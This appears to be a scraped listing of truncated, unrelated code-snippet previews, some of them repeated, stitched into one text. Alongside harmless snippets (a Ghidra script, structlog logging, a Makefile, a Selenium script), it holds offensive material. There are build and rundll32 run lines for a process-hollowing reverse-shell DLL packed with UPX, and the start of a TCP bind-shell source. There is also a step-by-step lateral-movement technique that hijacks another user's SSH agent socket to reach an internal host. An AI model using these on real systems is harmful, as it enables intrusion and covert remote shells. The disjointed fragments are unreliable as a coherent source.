Requires Python 3.6+
Only 3rd party dependency is the Requests library. Install it with:
python3 -m pip install requests
#Example of showing function call parameters within a function using the decompiler. | |
#@author Frank Spierings | |
#@category | |
#@keybinding | |
#@menupath | |
#@toolbar | |
import ghidra.app.decompiler.DecompInterface as DecompInterface | |
import ghidra.app.decompiler.ClangTokenGroup as ClangTokenGroup |
Requires Python 3.6+
Only 3rd party dependency is the Requests library. Install it with:
python3 -m pip install requests
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll" | |
// | |
// Use -DDEBUG at compile time, for the logging printf messages. | |
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non-Microsoft DLLs into the host process. | |
// Use -DWAITFOR at compile time, to wait for the host process to finish. | |
// | |
// Run: | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe |
# Use it like this: | |
# | |
# structlog.configure( | |
# processors=[ | |
# structlog.processors.JSONRenderer(), | |
# LogToSqlite("/tmp/logs.db") | |
# ] | |
# ) | |
# log = structlog.get_logger() | |
# log.msg("say-hello", whom="world", num=[random.randint(1,55)]) |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
import requests, time | |
from lxml import etree | |
class TwitterHammer: | |
def __init__(self, username, password): | |
self.username = username | |
self.password = password |
// This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.c | |
#include <sys/socket.h> | |
#include <sys/types.h> | |
#include <netinet/in.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
int main() | |
{ |
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll" | |
// | |
// Use -DDEBUG at compile time, for the logging printf messages. | |
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non-Microsoft DLLs into the host process. | |
// Use -DWAITFOR at compile time, to wait for the host process to finish. | |
// | |
// Run: | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe |
# Object files built from the C and assembly sources; linked into `main` below.
OBJECTS = func.o main.o | |
# C toolchain: 32-bit objects (-m32), compile only (-c), every warning fatal (-Werror).
CC = gcc | |
CFLAGS = -std=c11 -m32 -Wall -Wextra -Werror -c | |
# Assembler toolchain: nasm emitting 32-bit ELF objects.
AS = nasm | |
ASFLAGS = -f elf | |
# Default target: link the objects into a 32-bit `main` binary.
# NOTE: the link step calls gcc directly instead of $(CC), so overriding CC
# on the command line only affects compilation, not linking.
all: $(OBJECTS) | |
gcc -m32 $(OBJECTS) -o main | |
run: all |
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
from selenium import webdriver | |
driver = webdriver.Firefox()
driver.get('https://www.facebook.com/')

# Read the bundled jQuery build from disk, then evaluate it in the page so `$` exists.
with open('jquery-1.9.1.min.js', 'r') as jquery_file:
    jquery_source = jquery_file.read()
driver.execute_script(jquery_source)

# NOTE(review): jQuery's .text() sets textContent; for an <input> element the
# usual setter is .val() — confirm this does what the author intended.
driver.execute_script("$('#email').text('anhld')")